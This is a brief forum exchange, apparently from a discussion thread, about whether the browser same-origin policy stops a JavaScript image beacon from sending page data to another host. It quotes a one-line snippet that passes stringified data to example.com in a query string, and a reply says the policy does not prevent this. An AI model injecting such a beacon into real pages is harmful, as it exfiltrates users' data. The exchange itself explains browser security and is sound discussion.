
How does same-origin policy (on a MITM'd website) prevent this?

    (new Image()).src = 'https://example.com/data.php?payload=' + JSON.stringify(data);



It doesn't, because same-origin protects data on example.com, not on the embedding page (in your example). It is not a security measure that aims to prevent the issue mentioned by the grandparent post.




